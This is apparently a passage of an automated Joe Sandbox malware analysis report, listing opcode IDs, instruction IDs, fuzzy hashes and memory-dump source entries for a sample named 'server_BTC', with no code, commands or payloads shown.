                                                                                                                                • Opcode ID: 0e25f46a2bccdad91d36fa2a6c5a930cf04e2a6e6b4553f84219e659c8112cf2
                                                                                                                                • Instruction ID: 6ac1de27440eca012fbdf30420e2a319c49f097ad9b74a449cb51e2830873edc
                                                                                                                                • Opcode Fuzzy Hash: 0e25f46a2bccdad91d36fa2a6c5a930cf04e2a6e6b4553f84219e659c8112cf2
                                                                                                                                • Instruction Fuzzy Hash: CE41ABB4D01248DFDB14DFAAC984ADEFBF6AF88700F14802AE429AB250D7749946CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c62d4befe758f69250ebb23a780f4a8ba432ebf6d6c39fc00df88d3a546a1418
                                                                                                                                • Instruction ID: 6025f3e8005bd5ed05c90af436b47a910919a479eb6581680d39bf6a2546c439
                                                                                                                                • Opcode Fuzzy Hash: c62d4befe758f69250ebb23a780f4a8ba432ebf6d6c39fc00df88d3a546a1418
                                                                                                                                • Instruction Fuzzy Hash: B2419CB4D01248DFDB14DFAAC984ADEFBF5AF88700F14802AE429AB254D7749945CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7a00eba7f98af4524ffbba7ac1cead087f6677807fd65dfe784d39f58aa55452
                                                                                                                                • Instruction ID: f26728d120da7357c195c33fe1f147ad15fcc66d85fff6740671cd8973f1c483
                                                                                                                                • Opcode Fuzzy Hash: 7a00eba7f98af4524ffbba7ac1cead087f6677807fd65dfe784d39f58aa55452
                                                                                                                                • Instruction Fuzzy Hash: 1CB29F74902319CFCB69EF64C894ADDB7B2FB89700F6041E9D409AB660DB3A5E81CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5fcbcdaf210b53f907c1490853e02ff5317d3004e64328d4db0736c70a523dad
                                                                                                                                • Instruction ID: d0af0487163fd0ef2deae2acf21c84a67cc2e70c4a6673d6ab1eabb71c33b8fd
                                                                                                                                • Opcode Fuzzy Hash: 5fcbcdaf210b53f907c1490853e02ff5317d3004e64328d4db0736c70a523dad
                                                                                                                                • Instruction Fuzzy Hash: 5FB29F74902319CFCB69EF64C894ADDB7B2FB89700F6041E9D409AB660DB3A5E81CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9978d2fb1b048e04adf623d72eaebf6fa79b4175582488a8262841c929869663
                                                                                                                                • Instruction ID: ace7dd075355087ea1d266ffa5337bc545bcc8d39d567095547c037266ea914c
                                                                                                                                • Opcode Fuzzy Hash: 9978d2fb1b048e04adf623d72eaebf6fa79b4175582488a8262841c929869663
                                                                                                                                • Instruction Fuzzy Hash: 8D62B074A01259CFDB64DF64D894BADBBB2FF49300F2080EAD40AA7650DB3A5E81DF45
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d40bf81a645cb505222047c54b0164d12600bbe48e1e4ae07b718b6885ab8500
                                                                                                                                • Instruction ID: 491c21aa4b792f8c39fca36bfb05bbb1d8ae4773aec2c50ee44b0ce4ad974ae6
                                                                                                                                • Opcode Fuzzy Hash: d40bf81a645cb505222047c54b0164d12600bbe48e1e4ae07b718b6885ab8500
                                                                                                                                • Instruction Fuzzy Hash: A462AF74A01259CFDB64DF64D894BADBBB2FF49300F2080EAD40AA7650DB3A5E81DF45
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d768660b87adf80278b78175319cd03fdfc3f3d4e2f03960dcb1aeb1dd12dfe8
                                                                                                                                • Instruction ID: 9d81ca760d7f217dde37ce7cfbb79f4d1a4b9c10023100be0e3250c91f53c963
                                                                                                                                • Opcode Fuzzy Hash: d768660b87adf80278b78175319cd03fdfc3f3d4e2f03960dcb1aeb1dd12dfe8
                                                                                                                                • Instruction Fuzzy Hash: B841CCB0D012489FDB15CFAAC984AEEBBF5AF89700F14842AE418AB250DB749885CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ca5e8e13ca85838f258cd9c563eaf912fac620a525db08522c9ab917512a8197
                                                                                                                                • Instruction ID: fe867ec41e67b3dc2ff3cfae4d670aa55e4cfd5d496cd319522620507c17ef50
                                                                                                                                • Opcode Fuzzy Hash: ca5e8e13ca85838f258cd9c563eaf912fac620a525db08522c9ab917512a8197
                                                                                                                                • Instruction Fuzzy Hash: 71B1CC74A02228CFDB64DF68C984B9DB7B2BB89204F1085EAD80DA7351DB356E84CF51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b72300f0b8da5d5303ace44b7f62af4fe3b654e86def3e25c590e548be1b275b
                                                                                                                                • Instruction ID: 9b045f74b972d59958bfa5e04c7d6ec01ea239478e970119d44822fa4b8757d5
                                                                                                                                • Opcode Fuzzy Hash: b72300f0b8da5d5303ace44b7f62af4fe3b654e86def3e25c590e548be1b275b
                                                                                                                                • Instruction Fuzzy Hash: BA51D374A00248CFCB48DFA8D994A9DBBF2FF89710F119169E806AB365DB35AC05CF14
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 915aae7eede2984e259891f9cd30af5ef97e8d7d3e3f5ec6e910f4478847f41a
                                                                                                                                • Instruction ID: ccbff1b14e72daa589839122464e62d2ac74a463b38ae7da085353301b012d99
                                                                                                                                • Opcode Fuzzy Hash: 915aae7eede2984e259891f9cd30af5ef97e8d7d3e3f5ec6e910f4478847f41a
                                                                                                                                • Instruction Fuzzy Hash: 92818B78E01318CFCB58DFA4D890A9DBBB1BF89700F6081A9E409AB761DB356D41CF60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: eca393d0d2168fe89349e0b0a1d0f5b04057735f9d7ac7239b391076f0e9b54b
                                                                                                                                • Instruction ID: 928949fe388b4f6db3783c300f4c9ff7930a4508f566e98db9a002be479c71ec
                                                                                                                                • Opcode Fuzzy Hash: eca393d0d2168fe89349e0b0a1d0f5b04057735f9d7ac7239b391076f0e9b54b
                                                                                                                                • Instruction Fuzzy Hash: 65818C78E01318CFCB58DFA4D894A9DBBB1BF89700F6081A9E419AB761DB356D41CF60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: da2749b4146318dff871fbefccfc845f5c3167258479c9f2257cb3492a2c8fd6
                                                                                                                                • Instruction ID: df95dde0338876ff43770e8a0f4669904bb8d0e24f6f28df014487327f20b263
                                                                                                                                • Opcode Fuzzy Hash: da2749b4146318dff871fbefccfc845f5c3167258479c9f2257cb3492a2c8fd6
                                                                                                                                • Instruction Fuzzy Hash: E341BDB8D06308CFDB54DFA9D494AEDBBF5AB49300F24402AD825BB350DB395942CF50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9c01fbc10c6076161b146bec88281289775d9a143516cfce0305d9e47f889492
                                                                                                                                • Instruction ID: 5b4aab74dbfd427cd0349f56669a637b474e69feb2384bb683ac53ebe2b142ce
                                                                                                                                • Opcode Fuzzy Hash: 9c01fbc10c6076161b146bec88281289775d9a143516cfce0305d9e47f889492
                                                                                                                                • Instruction Fuzzy Hash: 8D41F575E012089FDB08DFA4D894AEEBBF2FF89311F108069E415B72A4DB755904CF94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: c72d74564a98fdfac5bb649d10b21371cf596483ba8eaceb9cbc1984a1390678
                                                                                                                                • Instruction ID: ccd57091976f861f7408f279c9295d3a3275f33a1f83998c4075dcac0040780e
                                                                                                                                • Opcode Fuzzy Hash: c72d74564a98fdfac5bb649d10b21371cf596483ba8eaceb9cbc1984a1390678
                                                                                                                                • Instruction Fuzzy Hash: 8741F274E012089FDB08DFA9D894AEEBBF2FF89310F108069E416B72A4DB755900CF94
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: da5a0f950a1c111cd9d959c59b628341111040130605ca026b76145669164777
                                                                                                                                • Instruction ID: 6eacd402472d80d7805877697677dfff74865f03380d2152f12ba87e5b430b08
                                                                                                                                • Opcode Fuzzy Hash: da5a0f950a1c111cd9d959c59b628341111040130605ca026b76145669164777
                                                                                                                                • Instruction Fuzzy Hash: CC41ACB4D012489FDB14DFEAD984ADEFFF5AF88700F24802AE419AB250DB749985CF54
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 53b971edc0663e4d47fb69370f0820fc02fd328c7b467f2c7a3053077b2da310
                                                                                                                                • Instruction ID: 446689967ba7a9c7fc9ca0552cad886a2d9d31c1880daec90a3f91b699391fe5
                                                                                                                                • Opcode Fuzzy Hash: 53b971edc0663e4d47fb69370f0820fc02fd328c7b467f2c7a3053077b2da310
                                                                                                                                • Instruction Fuzzy Hash: B431E675E012098FDB09DFA4C550AEEB7B2BB89301F10556AC415B7390DB7A9E41CF64
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a4174b2a5a1dc78d894bd50f167a443ee8bbdb063f7cd463875c3df82ed53c84
                                                                                                                                • Instruction ID: 8928b1985bae0236114326c4bed9671ca30231f0d24a04f25d3d33b4281f2cfc
                                                                                                                                • Opcode Fuzzy Hash: a4174b2a5a1dc78d894bd50f167a443ee8bbdb063f7cd463875c3df82ed53c84
                                                                                                                                • Instruction Fuzzy Hash: C821EE34E012098BDB08DFA4C550AEEB7B2EF89201F2095A9C415B7390DB7AAE41CF64
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f1420cf539c1a8660457bda41f9fc9b4c4a1d13a060065a3677918aace25fe7a
                                                                                                                                • Instruction ID: b0e6e3c55a0c09010405c5d30bd481ac85ce366b3f70e35435e887253c49707c
                                                                                                                                • Opcode Fuzzy Hash: f1420cf539c1a8660457bda41f9fc9b4c4a1d13a060065a3677918aace25fe7a
                                                                                                                                • Instruction Fuzzy Hash: F42189759063499FDB04EFB4D9593EEBBF0EB43311F0498AAC051A7291D7780644DB51
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 57d672af375eb9d974eea0cf174d88851d2b7c6d012a826c09cffa2b64068afc
                                                                                                                                • Instruction ID: 922034ed8d81b0cb781e6c666a0021407324f1ef20dc597963c663e7e2b0e863
                                                                                                                                • Opcode Fuzzy Hash: 57d672af375eb9d974eea0cf174d88851d2b7c6d012a826c09cffa2b64068afc
                                                                                                                                • Instruction Fuzzy Hash: 4611E930304B458FDB16EF38E56196A7BB6EBC6720B0000B9D442DB6A2CF398C088792
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 908670c7f2e5b10f47dd50d7898b5dd6a79dfc2ca2e31afee61b88313a992ac7
                                                                                                                                • Instruction ID: 7a87a5643b34e6c03e08f9a9783ca10043d1ea1272c32b6127f1fe523690bf15
                                                                                                                                • Opcode Fuzzy Hash: 908670c7f2e5b10f47dd50d7898b5dd6a79dfc2ca2e31afee61b88313a992ac7
                                                                                                                                • Instruction Fuzzy Hash: 1401BC703007059FDB14EF69E4659AE77EAFBC4620B004038D506EB760DF39DC008791
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 3a41dfcfca4f0e6c9e5477238c92f184954c2d7cf70529e987e88f9a25f92666
                                                                                                                                • Instruction ID: 8479dd8fb9a1bdab740854a3edac3a2f71071e350c535228a024e518bea2702d
                                                                                                                                • Opcode Fuzzy Hash: 3a41dfcfca4f0e6c9e5477238c92f184954c2d7cf70529e987e88f9a25f92666
                                                                                                                                • Instruction Fuzzy Hash: B3015678C02209DFDB44EFB4D41D3EEBBF0EB06301F0498AA8412A3280DB780644DF91
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0aa90b92ba16a0984e14d7e2aacf88885e6df3c01c5874f47cbb1457740ac5fc
                                                                                                                                • Instruction ID: 09a10c7fef00335e23be432d02ca0507356af51d9ebfe21a2005bec35953fae2
                                                                                                                                • Opcode Fuzzy Hash: 0aa90b92ba16a0984e14d7e2aacf88885e6df3c01c5874f47cbb1457740ac5fc
                                                                                                                                • Instruction Fuzzy Hash: E501C830A423199FDB69DB30C85079AB332AFC6315F5194E9C08967390CE3A9E85CF06
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b012a1039b64df6a10f0c8b40d8615691400eeafd918cb970831c1c1fd87b133
                                                                                                                                • Instruction ID: 9b137fee63a78afcc2acf615098c7afcfb7b4cc89d846060de4d9af48bc46c24
                                                                                                                                • Opcode Fuzzy Hash: b012a1039b64df6a10f0c8b40d8615691400eeafd918cb970831c1c1fd87b133
                                                                                                                                • Instruction Fuzzy Hash: 55F02B1290E3D50ED333CF7499586E43FA96F47128B0E01C9C4992F1E7EB1241A1C3DA
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 7fa9c0540af4f48552793de3212eb9abc5b48d37f39ff63066de374dc2f1b282
                                                                                                                                • Instruction ID: 0d09b72a70518fff000110d6c05f8af72d395bdf69d1475e0b8b612968f5f4bb
                                                                                                                                • Opcode Fuzzy Hash: 7fa9c0540af4f48552793de3212eb9abc5b48d37f39ff63066de374dc2f1b282
                                                                                                                                • Instruction Fuzzy Hash: FCF01C74901259CFCB64DFA4D5486FCFBB0EF8A312F0464A6E40AA7250CB359985CF24
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 845704a7f89cf7750650eb0f3e4e23542a5f080e4371fff22a63620cc0608181
                                                                                                                                • Instruction ID: 359881d87c212b5593bf51777d4910cccfd965c26480813ae0ae41cba974a626
                                                                                                                                • Opcode Fuzzy Hash: 845704a7f89cf7750650eb0f3e4e23542a5f080e4371fff22a63620cc0608181
                                                                                                                                • Instruction Fuzzy Hash: 73F0A0B55042448FC314DF64D944A697FB0EB46321F0502E99944AB3E2C7349842CB41
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b956fede001e91f7a2a8da2c573d3ee66fda2cf389cd55011f66c6cc3bcd28a8
                                                                                                                                • Instruction ID: bcf10481adf528332cf4b21bc53c9c1d03ae69cc51b0f67c17023c01b9fb9f4f
                                                                                                                                • Opcode Fuzzy Hash: b956fede001e91f7a2a8da2c573d3ee66fda2cf389cd55011f66c6cc3bcd28a8
                                                                                                                                • Instruction Fuzzy Hash: D5E06836C003408FC720CEA4DA815E8BB32FBC5362F1424A7C509F7280C3319A00C754
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: d1a9bdb18ae21db48f63cfd8c798ea0943fbea65bfed65de932ac852c9362d6b
                                                                                                                                • Instruction ID: 4b6a00293c93fd9eb7a9c61f8eeb3a9c9504339b55ba9c10bbad01966cbd96f3
                                                                                                                                • Opcode Fuzzy Hash: d1a9bdb18ae21db48f63cfd8c798ea0943fbea65bfed65de932ac852c9362d6b
                                                                                                                                • Instruction Fuzzy Hash: D1E02271905248DFCB50DFB0DA487EDBBB0AB41201F1041AA8409A3241DB351E00D742
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: f4ab97ea6da91f3eff805dd8f3c9aa2d403294e0b003adcf85975d321361803e
                                                                                                                                • Instruction ID: 237a4dcdb0c6cb0c4ed4935c199ca35136ccf77529d6a33441d29a5a35a042ff
                                                                                                                                • Opcode Fuzzy Hash: f4ab97ea6da91f3eff805dd8f3c9aa2d403294e0b003adcf85975d321361803e
                                                                                                                                • Instruction Fuzzy Hash: 68E01AB4A11208DFC744EF78E548A59BBF4FB8A711F1041B9D809A7364EB34AD45CB80
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 0cb4a0b5bacdde9386424e7f3f99d67f96ece89a08395dea641dcb2261b92304
                                                                                                                                • Instruction ID: 79197a9c38eeee11aad02e73d8da77fded00094afcef441c49e002f4eb21302d
                                                                                                                                • Opcode Fuzzy Hash: 0cb4a0b5bacdde9386424e7f3f99d67f96ece89a08395dea641dcb2261b92304
                                                                                                                                • Instruction Fuzzy Hash: FCE04F70501208EFCB04EFA4D545A9DB7B9EB45210F1085A99409A3200DB351E04D781
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b7cf57b82c53a9b16b6ebbb64a59412aded1ec31b442ef77174651c8042c7930
                                                                                                                                • Instruction ID: 731bb3f2b7470fb5c1c1e7929b99e4b4cbf083a543cefa7dfbc82129af0c692f
                                                                                                                                • Opcode Fuzzy Hash: b7cf57b82c53a9b16b6ebbb64a59412aded1ec31b442ef77174651c8042c7930
                                                                                                                                • Instruction Fuzzy Hash: 33D02EB2888349AFC7448A90E802B00BA7CD303302F0101A8E20466180EBA14800E261
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b5235a6ae63046a5e98fd11670925949d360a4cc103882e4149cd21fffde2d53
                                                                                                                                • Instruction ID: e5cd0dcce6712b0ea927d5509cbeac585c04be482bf4dcfb1feee7dc57b34035
                                                                                                                                • Opcode Fuzzy Hash: b5235a6ae63046a5e98fd11670925949d360a4cc103882e4149cd21fffde2d53
                                                                                                                                • Instruction Fuzzy Hash: 1AD0A9F2C883848BD300CEF0AA0AB687A70AB83703F06218E941823281DB308404AB09
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b1ac439b5012d8efcd6145be5a29d1de3df64f811bc73427bbd124fcb73f5874
                                                                                                                                • Instruction ID: 33ac5dd88022201186e20c8472480740a279d19c9b539353a2bb7dd88271a38a
                                                                                                                                • Opcode Fuzzy Hash: b1ac439b5012d8efcd6145be5a29d1de3df64f811bc73427bbd124fcb73f5874
                                                                                                                                • Instruction Fuzzy Hash: 54C0807080530C9FD714DFB4A405F55BBBCDB43615F40119DD50853200DB718544D799
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000E.00000002.1570115923.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_14_2_30b0000_server_BTC.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
